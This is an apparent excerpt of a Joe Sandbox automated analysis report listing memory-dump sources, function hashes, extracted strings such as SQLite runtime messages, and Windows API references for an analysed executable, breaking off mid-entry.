                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: )$BINARY
                                                                                    • API String ID: 0-1060320443
                                                                                    • Opcode ID: 27fd47c654d7abc8cb474bf0ede9b3f40dd6e8b30820ebc34d5f4fe7ea1a0661
                                                                                    • Instruction ID: 22339f8a62e4e9e600ad43843e9a738f32d94d7d21e672e01f4de907af8673e2
                                                                                    • Opcode Fuzzy Hash: 27fd47c654d7abc8cb474bf0ede9b3f40dd6e8b30820ebc34d5f4fe7ea1a0661
                                                                                    • Instruction Fuzzy Hash: 40C26870604741CFD720EF18C090B66B7E1FF89304F1685AEE9998B3A2DB79E955CB81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$rows deleted
                                                                                    • API String ID: 0-3120709674
                                                                                    • Opcode ID: ebe95eec7c1aba7205a4076bf4c7b193c364ae076c5f497f56774f252a84dd30
                                                                                    • Instruction ID: 2c3f0f7276765e80cb45c4ded73af73bcc81a1cec1fa46183b73ad1e6ab7b3d3
                                                                                    • Opcode Fuzzy Hash: ebe95eec7c1aba7205a4076bf4c7b193c364ae076c5f497f56774f252a84dd30
                                                                                    • Instruction Fuzzy Hash: F5C2A870A047419FD724DF18C480B6ABBE1FF88304F1586ADE9898B392DB79E955CF81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 3d51ab2d14b514cf8ec3a71763323504cafe747708bc9f934d8564ee27cf3674
                                                                                    • Instruction ID: 08155235c21746934987990ddf35eca6f3df304959acee53cfffac3f8e62d5ac
                                                                                    • Opcode Fuzzy Hash: 3d51ab2d14b514cf8ec3a71763323504cafe747708bc9f934d8564ee27cf3674
                                                                                    • Instruction Fuzzy Hash: 372374B5E00109AFCB08DFD8D991EEEB7B5BF8C304F2481A9E519A7345D635AE01CB64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67202e5d63e627e102ffa40a18ed20bdf64c3bbab6ecfbe40ae856d6d2a91856
                                                                                    • Instruction ID: 432f0d31ec54d6c66075b2593eeee17d4679dc99ce0ae126b5d7f13a6fcdd940
                                                                                    • Opcode Fuzzy Hash: 67202e5d63e627e102ffa40a18ed20bdf64c3bbab6ecfbe40ae856d6d2a91856
                                                                                    • Instruction Fuzzy Hash: AAF12071E002199FDF14CFA9C9846AEF7B1FF48314F258269D929AB385D731AE41CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $
                                                                                    • API String ID: 0-227171996
                                                                                    • Opcode ID: 140e4b2268ac04ea10abb0bdeb058c0bad9e21f5e1c05fcd8d1e63fafeca1222
                                                                                    • Instruction ID: c76cad6593ccf5279628ee13e07f4505ef8286164aa254d6b5b7e056b372c74f
                                                                                    • Opcode Fuzzy Hash: 140e4b2268ac04ea10abb0bdeb058c0bad9e21f5e1c05fcd8d1e63fafeca1222
                                                                                    • Instruction Fuzzy Hash: F842C374E0011ADBDB18CF88C590BADBBF2FF88308F2481A9D915AB745C735AA91DF54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: bad input$close
                                                                                    • API String ID: 0-1108095539
                                                                                    • Opcode ID: c5b01203d2be2590ee397a7832f9ebf2f5d7f02326d483f7c6315c72c9c7467e
                                                                                    • Instruction ID: b06731ba5b4d2ecb508fcc523dca9b49c0851fd2d7c5627cc00581ecccdb1650
                                                                                    • Opcode Fuzzy Hash: c5b01203d2be2590ee397a7832f9ebf2f5d7f02326d483f7c6315c72c9c7467e
                                                                                    • Instruction Fuzzy Hash: FCB108B090410EDFCB48CF99D891AEEBBF1FF89304F148169E919AB341D6349A51CFA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w
                                                                                    • API String ID: 0-476252946
                                                                                    • Opcode ID: d5bbcd6a0ef1f6a044b6607345a891f3dfc2bd536c76f21a0f3a11c369bedf57
                                                                                    • Instruction ID: 11485103ee633dafb74be54c4aa633c2a8af2d7944015dfab22b387ee9c9ff19
                                                                                    • Opcode Fuzzy Hash: d5bbcd6a0ef1f6a044b6607345a891f3dfc2bd536c76f21a0f3a11c369bedf57
                                                                                    • Instruction Fuzzy Hash: F0C267746047418FC724EF18C090B6ABBE1FF89304F5585ADE98A8B362DB35E959CF81
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B3444C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID:
                                                                                    • API String ID: 885266447-0
                                                                                    • Opcode ID: e0ea4dd231280728f08f0b30a8e8a5290a2b218034d201cdd37f8cdbf0feb3d4
                                                                                    • Instruction ID: 6d24df873744db569cd4f57369637a8224263d3fa6f558ba5eefe93e534fcbb1
                                                                                    • Opcode Fuzzy Hash: e0ea4dd231280728f08f0b30a8e8a5290a2b218034d201cdd37f8cdbf0feb3d4
                                                                                    • Instruction Fuzzy Hash: B8628E70A046519FD728DF28C480B2AB7E1FF99714F2586ECE8599B352D731EC82CB91
                                                                                    Strings
                                                                                    • USING INDEX %s FOR IN-OPERATOR, xrefs: 00B4E9B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: USING INDEX %s FOR IN-OPERATOR
                                                                                    • API String ID: 0-3230214820
                                                                                    • Opcode ID: b98cc717cd329fdb0505b69e3f68ceb74e7e3395b8d534cfbedb7d7c4c5027c4
                                                                                    • Instruction ID: 141712cc5e7cb38a79790f17f35e93c1b2481ae25e1d7e4438afddc24d00eee4
                                                                                    • Opcode Fuzzy Hash: b98cc717cd329fdb0505b69e3f68ceb74e7e3395b8d534cfbedb7d7c4c5027c4
                                                                                    • Instruction Fuzzy Hash: FB727175A043418FD714CF28C080A6AB7E2FF99314F1986DDE8A59B392D731EE45DB81
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __allrem
                                                                                    • String ID:
                                                                                    • API String ID: 2933888876-0
                                                                                    • Opcode ID: c13240376ff9a5ad3cc9fe1b72d3700b5104a7048a7fd2af6ab77c3ba8808e97
                                                                                    • Instruction ID: 8ee05eec8d8f458e867c9fc4a75fad27ccfbb3a83945ab0ca22950f831ed6bce
                                                                                    • Opcode Fuzzy Hash: c13240376ff9a5ad3cc9fe1b72d3700b5104a7048a7fd2af6ab77c3ba8808e97
                                                                                    • Instruction Fuzzy Hash: 92123871E002299BDB28CFA8E881BADB7F1FF48314F1441A9E909EB351D775AD51CB90
                                                                                    Strings
                                                                                    • Expression tree is too large (maximum depth %d), xrefs: 00B9180A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Expression tree is too large (maximum depth %d)
                                                                                    • API String ID: 0-1961352115
                                                                                    • Opcode ID: 9db2e89c5bc83fd065a413154405e87b23948a739b79a448612dabf8a50aa7d2
                                                                                    • Instruction ID: 83713550f3b5d09de6483bcb38c629ff1f7db0120383aebd0bd6869f416822f9
                                                                                    • Opcode Fuzzy Hash: 9db2e89c5bc83fd065a413154405e87b23948a739b79a448612dabf8a50aa7d2
                                                                                    • Instruction Fuzzy Hash: C6527E71A083428BDB14CF18C48062AB7E2FFC9714F258ABDE8959B391D771EC45DB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: e0fbd5e8d5f9052a45765b2f922d6dcba464efe1c3fb01738740312eb938c201
                                                                                    • Instruction ID: 7235eb11f5673a9a9b1533e35efa83ae2212291786945d1dff051ca0c9962fe6
                                                                                    • Opcode Fuzzy Hash: e0fbd5e8d5f9052a45765b2f922d6dcba464efe1c3fb01738740312eb938c201
                                                                                    • Instruction Fuzzy Hash: 44625975A542688BDF24CF29C890BA9B7F1FF49310F1581E9D94DAB242DB309E85CF50
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00C095BC,00000000,?,00000008,?,?,00C1CF1D,00000000), ref: 00C097EE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 8b702e04c3919252226e45826bc70ebea98986980d2f2be433c66c9a050ed307
                                                                                    • Instruction ID: 66bc80aa8fb39bb13e5c3d46226365690c37de8174bd66f70013e74aa29dfd9e
                                                                                    • Opcode Fuzzy Hash: 8b702e04c3919252226e45826bc70ebea98986980d2f2be433c66c9a050ed307
                                                                                    • Instruction Fuzzy Hash: 57B12D36620605DFD719CF2CC486B657BA0FF45364F258658E9A9CF2E2C336EA91CB40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s%s
                                                                                    • API String ID: 0-3252725368
                                                                                    • Opcode ID: efa0a4378ec79ece930def417e8ff8c5c47901567d2301304a9dcdf7cfc5ee3e
                                                                                    • Instruction ID: 6f7d256e0d64fc0a820374a1c745c5df3b5bafd1c8dcc283538914ebdd2cad15
                                                                                    • Opcode Fuzzy Hash: efa0a4378ec79ece930def417e8ff8c5c47901567d2301304a9dcdf7cfc5ee3e
                                                                                    • Instruction Fuzzy Hash: C5F1BE71604B448FD724DF28D451B6AB7E1FFC9318F24869EF8898B291EB31D945C782
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %*
                                                                                    • API String ID: 0-3615067565
                                                                                    • Opcode ID: b591439d39ad0548bb430067a86a5b4d8ff74431140927475c2ef45b96ca858c
                                                                                    • Instruction ID: c4f5dc02b6bf33fa5178538485540922f169b741804cb9551c058cb36411b531
                                                                                    • Opcode Fuzzy Hash: b591439d39ad0548bb430067a86a5b4d8ff74431140927475c2ef45b96ca858c
                                                                                    • Instruction Fuzzy Hash: 99D12474A007058FDB25CF68D494BAABBF2FF48304F5484A9D84A9B391DB30E9A5CB51
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D281: GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                      • Part of subcall function 00C0D281: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                    • EnumSystemLocalesW.KERNEL32(00C16C16,00000001,00000000,?,-00000050,?,00C17244,00000000,?,?,?,00000055,?), ref: 00C16B62
                                                                                    Memory Dump Source
